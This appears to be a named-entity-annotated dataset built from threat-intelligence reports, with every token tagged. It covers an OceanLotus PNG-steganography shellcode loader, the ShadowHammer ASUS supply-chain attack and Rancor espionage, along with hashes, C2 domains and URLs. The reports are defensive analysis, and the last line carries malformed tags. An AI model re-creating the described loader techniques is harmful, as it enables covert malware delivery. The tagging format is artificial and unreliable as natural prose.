B-MAL +backdoor E-MAL +, O +might O +possibly O +be O +used O +also O +with O +other O +payloads O +. 
O + +The O +malicious O +DLL S-TOOL +exports O +the O +same O +function O +names O +as O +the O +original O +mcvsocfg.dll S-FILE +library O +. O + +All O +exports O +contain O +the O +exact O +same O +code O +which O +will O +decrypt O +the O +payload O +, O +inject O +it O +into O +memory O +, O +and O +execute O +it O +. O + +The O +payload O +is O +encoded O +inside O +a O +separate O +.png O +file O +using O +a O +technique O +called O +steganography O +. O + +On O +top O +of O +that O +, O +the O +decoded O +payload O +is O +also O +encrypted O +with O +AES-128 S-ENCR +and O +finally O +obfuscated O +with O +XOR O +0x3B O +. O + +It’s O +worth O +noting O +that O +the O +XOR S-TOOL +key O +is O +not O +hardcoded O +, O +but O +instead O +is O +read O +from O +the O +first O +byte O +of O +the O +C:\Windows\system.ini S-FILE +file O +. O + +One O +of O +the O +payloads O +we O +encountered O +was O +encoded O +inside O +an O +image O +of O +Kaito O +Kuroba1 O +, O +the O +gentleman O +thief O +character O +from O +a O +popular O +Japanese O +manga O +series O +. O + +To O +extract O +the O +payload O +, O +the O +malware O +will O +first O +initialize O +the O +GDI+ O +API O +and O +get O +the O +image O +width O +and O +height O +values O +. O + +The O +size O +of O +the O +payload O +is O +encoded O +within O +the O +first O +four O +pixels O +of O +the O +image O +. O + +After O +obtaining O +the O +size O +, O +the O +malware O +will O +allocate O +an O +appropriate O +memory O +buffer O +and O +proceed O +to O +decode O +the O +remaining O +payload O +byte O +by O +byte O +. O + +The O +payload O +is O +encoded O +in O +the O +same O +way O +as O +the O +size O +– O +each O +byte O +of O +the O +payload O +is O +computed O +from O +the O +ARGB O +color O +codes O +of O +each O +subsequent O +pixel O +in O +the O +image O +. 
O + +In O +case O +the O +payload O +is O +bigger O +than O +the O +image O +used O +to O +store O +it O +, O +the O +remaining O +payload O +bytes O +are O +simply O +attached O +to O +the O +image O +after O +its O +IEND O +marker O +, O +and O +read O +directly O +from O +the O +file O +. O + +The O +pixel O +encoding O +algorithm O +is O +fairly O +straightforward O +and O +aims O +to O +minimize O +visual O +differences O +when O +compared O +to O +the O +original O +image O +by O +only O +modifying O +the O +least O +significant O +bits O +of O +the O +red O +, O +green O +, O +and O +blue O +color O +byte O +values O +. O + +The O +alpha O +channel O +byte O +remains O +unchanged O +. O + +To O +encode O +a O +byte O +of O +the O +payload O +, O +the O +first O +three O +bits O +( O +0-2 O +) O +are O +stored O +in O +the O +red O +color O +, O +the O +next O +three O +bits O +( O +3-5 O +) O +are O +stored O +in O +the O +green O +color O +, O +and O +the O +final O +two O +bits O +( O +6-7 O +) O +are O +stored O +in O +the O +blue O +color O +. O + +Decoding O +is O +a O +simple O +inverse O +operation O +. O + +Windows S-OS +converts O +the O +.png O +pixel O +RGBA O +value O +to O +an O +ARGB O +encoding O +via O +the O +GdpiBitmapGetPixel B-TOOL +API E-TOOL +. O + +To O +aid O +in O +the O +recovery O +of O +encrypted O +payloads O +, O +the O +following O +Python B-TOOL +script E-TOOL +can O +be O +used O +to O +decode O +pixel O +colors O +from O +a O +.png O +image O +. O + +After O +decoding O +the O +.png O +image O +, O +the O +loader O +then O +proceeds O +to O +initialize O +the O +key O +and O +IV O +used O +to O +perform O +AES O +decryption O +of O +the O +encrypted O +payload O +. O + +Both O +values O +are O +supplied O +from O +an O +array O +of O +256 O +pseudo-random O +bytes O +hardcoded O +in O +the O +binary’s O +.rdata O +section O +. 
O + +The O +first O +two O +bytes O +of O +that O +array O +specify O +the O +relative O +offsets O +to O +the O +key O +and O +IV O +respectively O +. O + +The O +loader O +uses O +the O +AES128 S-ENCR +implementation O +from O +the O +open-source O +Crypto++2 B-TOOL +library E-TOOL +. O + +We O +were O +able O +to O +correlate O +most O +of O +the O +disassembly O +to O +the O +corresponding O +functions O +from O +the O +Crypto++ S-TOOL +github O +source O +, O +and O +it O +doesn’t O +appear O +that O +the O +malware O +authors O +have O +modified O +much O +of O +the O +original O +code O +. O + +A O +SimpleKeyringInterface S-TOOL +class O +is O +used O +to O +initialize O +the O +key O +, O +while O +the O +IV O +is O +passed O +to O +the O +SetCipherWithIV S-TOOL +function O +. O + +The O +decryption O +is O +performed O +with O +the O +use O +of O +the O +StreamTransformationFilter S-TOOL +class O +with O +the O +StreamTransformation S-TOOL +cipher O +set O +to O +AES O +CBC O +decryption O +mode O +. O + +The O +library O +code O +performs O +numerous O +checks O +for O +the O +CPU O +features O +, O +and O +based O +on O +the O +outcome O +, O +it O +will O +choose O +a O +processor-specific O +implementation O +of O +the O +cryptographic O +function O +. O + +One O +of O +the O +AES O +implementations O +makes O +use O +of O +the O +Intel S-IDTY +AES-NI S-TOOL +encryption O +instruction O +set O +which O +is O +supported O +by O +several O +modern O +Intel S-IDTY +and O +AMD S-IDTY +CPUs O +. O + +The O +decrypted O +payload O +undergoes O +one O +final O +transformation O +, O +where O +it O +is O +XORed O +with O +the O +first O +byte O +read O +from O +the O +C:\Windows\system O +. O +ini O +file O +, O +which O +is O +expected O +to O +begin O +with O +a O +comment O +character O +" O +; O +" O +( O +0x3B O +) O +. 
O + +Performing O +the O +same O +steps O +in O +CyberChef S-TOOL +, O +it O +is O +possible O +to O +decode O +the O +encrypted O +payload O +, O +which O +should O +yield O +x86 O +shellcode O +, O +starting O +with O +a O +call O +immediate O +opcode O +sequence O +. O + +Varies S-MAL +: O + +4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d S-SHA2 +Malware/Backdoor O +658 O +KB O +( O +674 O +, O +304 O +bytes O +) O +PE32 O +executable O +for O +MS O +Windows S-OS +( O +DLL S-TOOL +) O +( O +console O +) O +Intel S-IDTY +80386 O +32-bit O +September B-TIME +2018 E-TIME +. O + +While O +this O +loader O +differs O +somewhat O +in O +general O +implementation O +, O +the O +payload O +extraction O +routine O +seems O +to O +be O +the O +same O +as O +in O +the O +previous O +variant O +. O + +The O +main O +differences O +are O +: O + +The O +way O +the O +decryption O +routine O +is O +called O +( O +from O +within O +the O +DllMain S-TOOL +function O +, O +as O +opposed O +to O +an O +exported O +function O +) O +. O + +The O +way O +the O +payload O +is O +invoked O +( O +by O +overwriting O +the O +return O +address O +on O +the O +stack O +, O +as O +opposed O +to O +a O +direct O +call O +) O +. O + +Implementation O +of O +an O +additional O +anti-analysis O +check O +that O +compares O +the O +name O +of O +the O +parent O +process O +to O +a O +string O +stored O +in O +an O +encrypted O +resource O +. O + +We O +came O +across O +multiple O +variations O +of O +this O +DLL S-TOOL +containing O +different O +parent O +process O +names O +, O +possibly O +targeted O +specifically O +to O +the O +victim’s O +environment O +. O + +Some O +of O +these O +names O +include O +processes O +related O +to O +security O +software O +: O + +wsc_proxy.exe S-FILE +plugins-setup.exe S-FILE +SoftManager.exe S-FILE +GetEFA.exe S-FILE +. 
O + +Features O +: O + +Side-loaded O +DLL S-TOOL +Anti-debugging/anti-sandboxing O +check O +for O +parent O +process O +name O +. O + +Loads O +next-stage O +payload O +using O +custom B-TOOL +.png I-TOOL +steganography E-TOOL +. O + +Uses O +AES128 S-ENCR +implementation O +from O +Crypto++ B-TOOL +library E-TOOL +for O +payload O +decryption O +. O + +Executes O +the O +payload O +by O +overwriting O +the O +return O +address O +on O +the O +stack O +. O + +Known O +to O +load O +an O +updated O +version O +of O +Remy B-MAL +backdoor E-MAL +. O + +This O +DLL S-TOOL +does O +not O +contain O +an O +export O +table O +and O +its O +entire O +functionality O +resides O +in O +the O +DllMain S-TOOL +routine O +. O + +Upon O +execution O +, O +the O +malware O +will O +first O +decrypt O +a O +string O +from O +its O +resources O +and O +compare O +it O +against O +the O +name O +of O +the O +parent O +process O +. O + +If O +the O +names O +differ O +, O +the O +malware O +will O +simply O +exit O +without O +touching O +the O +payload O +. O + +The O +resource O +containing O +the O +expected O +process O +name O +( O +ICON/1 O +) O +is O +XORed O +with O +the O +first O +byte O +of O +the O +legitimate O +C:\Windows\system.ini S-FILE +file O +– O +0x3B O +( O +" O +; O +" O +) O +. O + +If O +the O +parent O +name O +matches O +, O +the O +malware O +will O +traverse O +the O +stack O +in O +order O +to O +find O +a O +return O +address O +that O +falls O +into O +the O +memory O +of O +the O +parent O +process’s O +text O +section O +. O + +Next O +, O +the O +payload O +is O +read O +from O +the O +.png O +cover O +file O +, O +which O +seems O +to O +have O +been O +taken O +from O +an O +inspirational O +quotes O +website3 O +. O + +In O +this O +instance O +, O +the O +payload O +is O +fully O +contained O +within O +the O +image’s O +pixel O +color O +codes O +, O +leaving O +no O +remaining O +data O +beyond O +the O +IEND O +marker O +. 
O + +Finally O +, O +the O +loader O +will O +decrypt O +the O +payload O +to O +a O +memory O +buffer O +and O +overwrite O +the O +previously O +found O +return O +address O +with O +the O +pointer O +to O +that O +buffer O +, O +ensuring O +that O +the O +malicious O +shellcode O +will O +be O +executed O +when O +the O +DLL S-TOOL +attempts O +to O +return O +to O +the O +caller O +. O + +The O +loader O +embedded O +in O +the O +payload O +seems O +to O +be O +a O +variant O +of O +the O +Veil S-TOOL +" O +shellcode_inject S-TOOL +" O +payload O +, O +previously O +used O +by O +OceanLotus S-APT +to O +load O +older O +versions O +of O +Remy B-MAL +backdoor E-MAL +. O + +In O +this O +instance O +, O +the O +shellcode O +is O +configured O +to O +load O +an O +encoded O +backdoor O +from O +within O +the O +payload O +. O + +The O +final O +payload O +comes O +in O +a O +form O +of O +a O +launcher O +DLL S-TOOL +that O +contains O +an O +encrypted O +backdoor O +in O +its O +.rdata O +section O +and O +a O +plain-text O +configuration O +in O +its O +resources O +. O + +The O +resources O +also O +store O +one O +or O +more O +C2 S-TOOL +communication O +modules O +. O + +The O +backdoor O +DLL S-TOOL +and O +the O +C2 S-TOOL +communication O +DLLs O +are O +heavily O +obfuscated O +using O +high O +quantities O +of O +junk O +code O +, O +which O +significantly O +inflates O +their O +size O +and O +makes O +both O +static O +analysis O +and O +debugging O +more O +difficult O +. O + +In O +addition O +to O +Denes S-MAL +and O +Remy B-MAL +backdoors E-MAL +, O +at O +least O +two O +different O +communication O +modules O +were O +observed O +with O +different O +versions O +of O +this O +launcher O +– O +DNSProvider S-TOOL +and O +HTTPProv S-TOOL +. O + +The O +launcher O +binary O +, O +which O +contains O +the O +final O +backdoor O +, O +is O +RC4 S-ENCR +encrypted O +and O +wrapped O +in O +a O +layer O +of O +obfuscated O +shellcode O +. 
O + +We O +can O +see O +the O +familiar O +DOS O +stub O +in O +plain O +text O +, O +but O +the O +rest O +of O +the O +header O +and O +binary O +body O +are O +encrypted O +. O + +The O +shellcode O +is O +obfuscated O +using O +OceanLotus S-APT +’s O +standard O +approach O +of O +flattening O +the O +control O +flow O +and O +inserting O +junk O +opcodes O +( O +as O +described O +in O +the O +ESET S-SECTEAM +white O +paper O +on O +OceanLotus S-APT +) O +. O + +The O +shellcode O +starts O +in O +a O +fairly O +standard O +way O +– O +by O +walking O +the O +list O +of O +loaded O +modules O +in O +order O +to O +find O +the O +base O +of O +kernel32.dll S-FILE +library O +. O + +Once O +kernel32 S-TOOL +base O +is O +found O +, O +the O +shellcode O +will O +calculate O +the O +addresses O +of O +LoadLibraryA S-TOOL +and O +GetProcAddress S-TOOL +functions O +, O +and O +use O +them O +to O +resolve O +other O +necessary O +APIs S-TOOL +, O +which O +include O +VirtualAlloc S-TOOL +, O +RtlMoveMemory S-TOOL +, O +and O +RtlZeroMemory S-TOOL +. O + +After O +resolving O +the O +APIs S-TOOL +, O +the O +shellcode O +will O +decrypt O +the O +launcher O +binary O +and O +load O +it O +to O +the O +memory O +. O + +MZ O +header O +, O +PE O +header O +, O +as O +well O +as O +each O +section O +and O +their O +header O +, O +are O +decrypted O +separately O +using O +RC4 S-TOOL +algorithm O +and O +a O +hardcoded O +key O +. O + +Once O +all O +sections O +are O +loaded O +, O +the O +relocations O +get O +fixed O +and O +the O +MZ/PE O +headers O +are O +zeroed O +out O +in O +memory O +. O + +The O +shellcode O +then O +proceeds O +to O +execute O +the O +payload O +DLL’s O +entry O +point O +. O + +The O +Internal O +name O +of O +this O +DLL S-TOOL +is O +a O +randomly O +looking O +CLSID S-TOOL +and O +it O +only O +exports O +one O +function O +called O +DllEntry S-TOOL +. 
O + +Upon O +execution O +, O +the O +launcher O +will O +attempt O +to O +hook O +legitimate O +wininet.dll S-FILE +library O +by O +overwriting O +its O +entry O +point O +in O +memory O +with O +the O +address O +of O +a O +malicious O +routine O +. O + +If O +successful O +, O +every O +time O +the O +system O +loads O +wininet.dll S-FILE +, O +the O +entry O +point O +of O +the O +subsequently O +dropped O +backdoor O +DLL S-TOOL +will O +be O +executed O +before O +the O +original O +wininet O +entry O +point O +. O + +There O +is O +no O +proper O +DLL S-TOOL +injection O +routine O +– O +the O +payload O +is O +just O +decompressed O +to O +the O +memory O +as-is O +– O +so O +the O +malware O +needs O +to O +fix O +all O +the O +pointers O +in O +the O +decompressed O +code O +, O +which O +is O +done O +on O +a O +one-by-one O +basis O +using O +hardcoded O +values O +and O +offsets O +. O + +This O +part O +takes O +90% O +of O +the O +whole O +launcher O +code O +and O +includes O +over O +11 O +, O +000 O +modifications O +. O + +The O +launcher O +then O +calls O +the O +backdoor O +DLL’s O +entry O +point O +. O + +The O +routine O +that O +reads O +configuration O +from O +resources O +and O +decompresses O +the O +C2 S-TOOL +communication O +library O +is O +then O +called O +by O +temporarily O +replacing O +the O +pointer O +to O +CComCriticalSection S-TOOL +function O +with O +the O +pointer O +to O +that O +routine O +. O + +Such O +an O +obfuscation O +method O +makes O +it O +difficult O +to O +spot O +it O +in O +the O +code O +. O + +The O +launcher O +loads O +configuration O +from O +resources O +and O +uses O +an O +export O +from O +the O +backdoor O +DLL S-TOOL +to O +initialize O +config O +values O +in O +memory O +. O + +Resource O +P1/1 O +contains O +config O +values O +, O +including O +port O +number O +and O +a O +registry O +path O +. 
O + +After O +the O +content O +of O +resource O +0xC8 O +is O +decompressed O +, O +another O +function O +from O +the O +backdoor O +DLL S-TOOL +is O +used O +to O +load O +the O +C2 S-TOOL +communication O +module O +to O +the O +memory O +and O +call O +its O +" O +CreateInstance S-TOOL +" O +export O +. O + +Finally O +, O +the O +launcher O +passes O +control O +to O +the O +main O +backdoor O +routine O +. O + +OceanLotus S-APT +: O +0 O +4 O +name O +is O +read O +from O +resource O +P1/0x64 O +. O + +OceanLotus S-APT +: O +{12C044FA-A4AB-433B-88A2-32C3451476CE} O +memory O +pointer O +4 O +points O +to O +a O +function O +that O +spawns O +another O +copy O +of O +malicious O +process O +. O + +OceanLotus S-APT +: O +{9E3BD021-B5AD-49DEAE93-F178329EE0FE} O +C&C O +URLs O +varies O +content O +is O +read O +from O +resource O +P1/2 O +. O + +OceanLotus S-APT +: O +0 O +config O +varies O +content O +is O +read O +from O +resource O +P1/1 O +. O + +OceanLotus S-APT +: O +{B578B063-93FB-4A5F-82B4-4E6C5EBD393B} O +? O +4 O +0 O +( O +config+0x486 O +) O +. O + +OceanLotus S-APT +: O +{5035383A-F7B0-424A-9C9A-CA667416BA6F} O +port O +number O +4 O +0x1BB O +( O +443 O +) O +( O +config+0x46C O +) O +. O + +OceanLotus S-APT +: O +{68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} O +registry O +path O +varies O +SOFTWARE\Classes\CLSID\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} O +. O + +The O +backdoor O +DLL S-TOOL +is O +stored O +in O +the O +.rdata O +section O +of O +the O +launcher O +, O +compressed O +with O +LZMA S-TOOL +, O +and O +encrypted O +with O +RC4 S-TOOL +. O + +The O +binary O +is O +heavily O +obfuscated O +with O +overlapping O +blocks O +of O +garbage O +code O +enclosed O +in O +pushf/popf O +instructions O +. 
O + +The O +DllMain S-TOOL +function O +replaces O +the O +pointer O +to O +GetModuleHandleA B-TOOL +API E-TOOL +with O +a O +pointer O +to O +hook O +routine O +that O +will O +return O +the O +base O +of O +the O +backdoor O +DLL S-TOOL +when O +called O +with O +NULL O +as O +parameter O +( O +instead O +of O +returing O +the O +handle O +to O +the O +launcher O +DLL S-TOOL +) O +. O + +The O +backdoor O +also O +contains O +an O +export O +that O +loads O +the O +C2 S-TOOL +communication O +module O +reflectively O +to O +the O +memory O +from O +resource O +passed O +as O +parameter O +and O +then O +calls O +its O +" O +CreateInstance S-TOOL +" O +export O +. O + +While O +we O +are O +still O +in O +the O +process O +of O +analyzing O +this O +backdoor’s O +full O +functionality O +, O +it O +seems O +to O +be O +similar O +to O +the O +Remy B-MAL +backdoor E-MAL +described O +in O +our O +previous O +whitepaper O +on O +OceanLotus S-APT +malware O +. O + +This O +DLL S-TOOL +is O +stored O +in O +the O +launcher’s O +resources O +and O +compressed O +with O +LZMA S-TOOL +. O + +It’s O +also O +heavily O +obfuscated O +, O +but O +in O +a O +slightly O +different O +way O +than O +the O +backdoor O +. O + +Although O +it O +doesn’t O +contain O +an O +internal O +name O +, O +we O +believe O +it’s O +a O +variant O +of O +HttpProv B-TOOL +library E-TOOL +, O +as O +described O +in O +the O +ESET S-SECTEAM +white O +paper O +on O +OceanLotus S-APT +. O + +This O +module O +is O +used O +by O +the O +backdoor O +during O +HTTP/HTTPS O +communication O +with O +the O +C2 S-TOOL +server O +and O +has O +a O +proxy O +bypass O +functionality O +. O + +OceanLotus S-APT +: O +ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 S-SHA2 +Loader O +#1 O +. O + +OceanLotus S-APT +: O +0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 S-SHA2 +Loader O +#1 O +. 
O + +OceanLotus S-APT +: O +a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e S-SHA2 +Loader O +#1 O +. O + +OceanLotus S-APT +: O +4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d S-SHA2 +Loader O +#2 O +. O + +OceanLotus S-APT +: O +e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e S-SHA2 +Loader O +#2 O +. O + +OceanLotus S-APT +: O +cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d S-SHA2 +Loader O +#2 O +. O + +OceanLotus S-APT +: O +9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 S-SHA2 +Loader O +#2 O +. O + +OceanLotus S-APT +: O +ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f S-SHA2 +Loader O +#2 O +. O + +OceanLotus S-APT +: O +478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382 S-SHA2 +Loader O +#2 O +. O + +OceanLotus S-APT +: O +72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a S-SHA2 +Payload O +PNG O +( O +loader O +#1 O +) O +. O + +OceanLotus S-APT +: O +11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f S-SHA2 +Payload O +PNG O +( O +loader O +#2 O +) O +. O + +OceanLotus S-APT +: O +d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced S-SHA2 +Payload O +PNG O +( O +loader O +#2 O +) O +. O + +OceanLotus S-APT +: O +E:\ProjectGit\SHELL\BrokenSheild\BrokenShieldPrj\Bin\x86\Release\DllExportx86.pdb S-FILE +Loader O +#1 O +. O + +OceanLotus S-APT +: O +C:\Users\Meister\Documents\Projects\BrokenShield\Bin\x86\Release\BrokenShield.pdb S-FILE +Loader O +#2 O +. O + +OceanLotus S-APT +: O +kermacrescen.com S-DOM +7244 O +. O + +OceanLotus S-APT +: O +stellefaff.com S-DOM +7244 O +. O + +OceanLotus S-APT +: O +manongrover.com S-DOM +7244 O +. O + +OceanLotus S-APT +: O +background.ristians.com:8888 S-DOM +11b4 O +. O + +OceanLotus S-APT +: O +enum.arkoorr.com:8531 S-DOM +11b4 O +. O + +OceanLotus S-APT +: O +worker.baraeme.com:8888 S-DOM +11b4 O +. 
O + +OceanLotus S-APT +: O +enum.arkoorr.com:8888 S-DOM +11b4 O +. O + +OceanLotus S-APT +: O +worker.baraeme.com:8531 S-DOM +11b4 O +. O + +OceanLotus S-APT +: O +plan.evillese.com:8531 S-DOM +11b4 O +. O + +OceanLotus S-APT +: O +background.ristians.com:8531 S-DOM +11b4 O +. O + +OceanLotus S-APT +: O +plan.evillese.com:8888 S-DOM +11b4 O +. O + +OceanLotus S-APT +: O +SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B} O +7244 O +. O + +OceanLotus S-APT +: O +SOFTWARE\App\AppX06c7130ad61f4f60b50394b8cba3d35f\Applicationz S-TOOL +7244 O +. O + +OceanLotus S-APT +: O +SOFTWARE\Classes\CLSID\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} O +11b4 O +. O + + +Operation O +ShadowHammer S-ACT +. O + +Earlier O +today O +, O +Motherboard S-IDTY +published O +a O +story O +by O +Kim O +Zetter O +on O +Operation O +ShadowHammer S-ACT +, O +a O +newly O +discovered O +supply B-ACT +chain I-ACT +attack E-ACT +that O +leveraged O +ASUS B-TOOL +Live I-TOOL +Update E-TOOL +software O +. O + +While O +the O +investigation O +is O +still O +in O +progress O +and O +full O +results O +and O +technical O +paper O +will O +be O +published O +during O +SAS O +2019 S-TIME +conference O +in O +Singapore S-LOC +, O +we O +would O +like O +to O +share O +some O +important O +details O +about O +the O +attack O +. O + +In O +January B-TIME +2019 E-TIME +, O +we O +discovered O +a O +sophisticated O +supply B-ACT +chain I-ACT +attack E-ACT +involving O +the O +ASUS B-TOOL +Live I-TOOL +Update I-TOOL +Utility E-TOOL +. O + +The O +attack O +took O +place O +between O +June S-TIME +and O +November B-TIME +2018 E-TIME +and O +according O +to O +our O +telemetry O +, O +it O +affected O +a O +large O +number O +of O +users O +. 
O + +ASUS B-TOOL +Live I-TOOL +Update E-TOOL +is O +an O +utility O +that O +is O +pre-installed O +on O +most O +ASUS S-IDTY +computers O +and O +is O +used O +to O +automatically O +update O +certain O +components O +such O +as O +BIOS S-TOOL +, O +UEFI S-TOOL +, O +drivers S-TOOL +and O +applications S-TOOL +. O + +According O +to O +Gartner S-IDTY +, O +ASUS S-IDTY +is O +the O +world’s O +5th-largest O +PC O +vendor O +by O +2017 S-TIME +unit O +sales O +. O + +This O +makes O +it O +an O +extremely O +attractive O +target O +for O +APT O +groups O +that O +might O +want O +to O +take O +advantage O +of O +their O +userbase O +. O + +Based O +on O +our O +statistics O +, O +over O +57 O +, O +000 O +Kaspersky S-SECTEAM +users O +have O +downloaded O +and O +installed O +the O +backdoored O +version O +of O +ASUS B-TOOL +Live I-TOOL +Update E-TOOL +at O +some O +point O +in O +time O +. O + +We O +are O +not O +able O +to O +calculate O +the O +total O +count O +of O +affected O +users O +based O +only O +on O +our O +data O +; O +however O +, O +we O +estimate O +that O +the O +real O +scale O +of O +the O +problem O +is O +much O +bigger O +and O +is O +possibly O +affecting O +over O +a O +million O +users O +worldwide O +. O + +The O +goal O +of O +the O +attack O +was O +to O +surgically O +target O +an O +unknown O +pool O +of O +users O +, O +which O +were O +identified O +by O +their O +network O +adapters’ O +MAC O +addresses O +. O + +To O +achieve O +this O +, O +the O +attackers O +had O +hardcoded O +a O +list O +of O +MAC O +addresses O +in O +the O +trojanized O +samples O +and O +this O +list O +was O +used O +to O +identify O +the O +actual O +intended O +targets O +of O +this O +massive O +operation O +. O + +We O +were O +able O +to O +extract O +more O +than O +600 O +unique O +MAC O +addresses O +from O +over O +200 O +samples O +used O +in O +this O +attack O +. 
O + +Of O +course O +, O +there O +might O +be O +other O +samples O +out O +there O +with O +different O +MAC O +addresses O +in O +their O +list O +. O + +We O +believe O +this O +to O +be O +a O +very O +sophisticated O +supply B-ACT +chain I-ACT +attack E-ACT +, O +which O +matches O +or O +even O +surpasses O +the O +Shadowpad S-ACT +and O +the O +CCleaner S-ACT +incidents O +in O +complexity O +and O +techniques O +. O + +The O +reason O +that O +it O +stayed O +undetected O +for O +so O +long O +is O +partly O +due O +to O +the O +fact O +that O +the O +trojanized O +updaters O +were O +signed O +with O +legitimate O +certificates O +( O +eg O +: O +“ O +ASUSTeK O +Computer O +Inc. O +” O +) O +. O + +The O +malicious O +updaters O +were O +hosted O +on O +the O +official O +liveupdate01s.asus.com S-URL +and O +liveupdate01.asus.com S-URL +ASUS S-IDTY +update O +servers O +. O + +We O +have O +contacted O +ASUS S-IDTY +and O +informed O +them O +about O +the O +attack O +on O +Jan B-TIME +31 I-TIME +, I-TIME +2019 E-TIME +, O +supporting O +their O +investigation O +with O +IOCs O +and O +descriptions O +of O +the O +malware O +. O + +Although O +precise O +attribution O +is O +not O +available O +at O +the O +moment O +, O +certain O +evidence O +we O +have O +collected O +allows O +us O +to O +link O +this O +attack O +to O +the O +ShadowPad S-ACT +incident O +from O +2017 S-TIME +. O + +The O +actor O +behind O +the O +ShadowPad S-ACT +incident O +has O +been O +publicly O +identified O +by O +Microsoft S-IDTY +in O +court O +documents O +as O +BARIUM S-APT +. O + +BARIUM S-APT +is O +an O +APT O +actor O +known O +to O +be O +using O +the O +Winnti B-MAL +backdoor E-MAL +. O + +Recently O +, O +our O +colleagues O +from O +ESET S-SECTEAM +wrote O +about O +another O +supply B-ACT +chain I-ACT +attack E-ACT +in O +which O +BARIUM S-APT +was O +also O +involved O +, O +that O +we O +believe O +is O +connected O +to O +this O +case O +as O +well O +. 
O + +It O +should O +be O +noted O +that O +the O +numbers O +are O +also O +highly O +influenced O +by O +the O +distribution O +of O +Kaspersky S-SECTEAM +users O +around O +the O +world O +. O + +In O +principle O +, O +the O +distribution O +of O +victims O +should O +match O +the O +distribution O +of O +ASUS O +users O +around O +the O +world O +. O + +We’ve O +also O +created O +a O +tool O +which O +can O +be O +run O +to O +determine O +if O +your O +computer O +has O +been O +one O +of O +the O +surgically O +selected O +targets O +of O +this O +attack O +. O + +To O +check O +this O +, O +it O +compares O +MAC O +addresses O +of O +all O +adapters O +to O +a O +list O +of O +predefined O +values O +hardcoded O +in O +the O +malware O +and O +alerts O +if O +a O +match O +was O +found O +. O + +Download O +an O +archive O +with O +the O +tool O +( O +.exe S-FILE +) O +. O + +Also O +, O +you O +may O +check O +MAC O +addresses O +online O +. O + +If O +you O +discover O +that O +you O +have O +been O +targeted O +by O +this O +operation O +, O +please O +e-mail S-TOOL +us O +at O +: O +shadowhammer@kaspersky.com O +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +verdicts O +for O +the O +malware O +used O +in O +this O +and O +related O +attacks O +. O + +ShadowHammer S-APT +: O +HEUR S-MAL +: O +Trojan.Win32.ShadowHammer.gen S-MAL +. O + +ShadowHammer S-APT +: O +asushotfix.com S-URL +. O + +ShadowHammer S-APT +: O +141.105.71.116 S-IP +. O + +ShadowHammer S-APT +: O +http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip S-URL +. O + +ShadowHammer S-APT +: O +https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip S-URL +. O + +ShadowHammer S-APT +: O +https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip S-URL +. 
O + +ShadowHammer S-APT +: O +https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip S-URL +. O + +ShadowHammer S-APT +: O +Liveupdate_Test_VER365.zip S-FILE +. O + +ShadowHammer S-APT +: O +aa15eb28292321b586c27d8401703494 S-SHA1 +. O + +Rancor S-APT +: O +Cyber O +Espionage O +Group O +Uses O +New O +Custom O +Malware O +to O +Attack O +Southeast B-LOC +Asia E-LOC +. O + +In O +late B-TIME +June I-TIME +2018 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +revealed O +a O +previously O +unknown O +cyber O +espionage O +group O +we O +dubbed O +Rancor S-APT +, O +which O +conducted O +targeted O +attacks O +in O +Southeast B-LOC +Asia E-LOC S-LOC +throughout O +2017 S-TIME +and O +2018 S-TIME +. O + +In O +recent O +attacks O +, O +the O +group O +has O +persistently O +targeted O +at O +least O +one O +government B-IDTY +organization I-IDTY +in I-IDTY +Cambodia B-LOC E-IDTY E-LOC +from O +December B-TIME +2018 E-TIME +through O +January B-TIME +2019 E-TIME +. O + +While O +researching O +these O +attacks O +, O +we O +discovered O +an O +undocumented O +, O +custom O +malware O +family O +– O +which O +we O +’ve O +named O +Dudell S-MAL +. O + +In O +addition O +, O +we O +discovered O +the O +group O +using O +Derusbi S-MAL +, O +which O +is O +a O +malware O +family O +believed O +to O +be O +unique O +to O +a O +small O +subset O +of O +Chinese O +cyber O +espionage O +groups O +. O + +Between O +early B-TIME +December I-TIME +2018 E-TIME +and O +the O +end B-TIME +of I-TIME +January I-TIME +2019 E-TIME +, O +Rancor S-APT +conducted O +at O +least O +two O +rounds O +of O +attacks O +intending O +to O +install B-ACT +Derusbi I-ACT +or I-ACT +KHRat I-ACT +malware I-ACT + S-MALon I-ACT + S-MALvictim I-ACT +systems E-ACT +. 
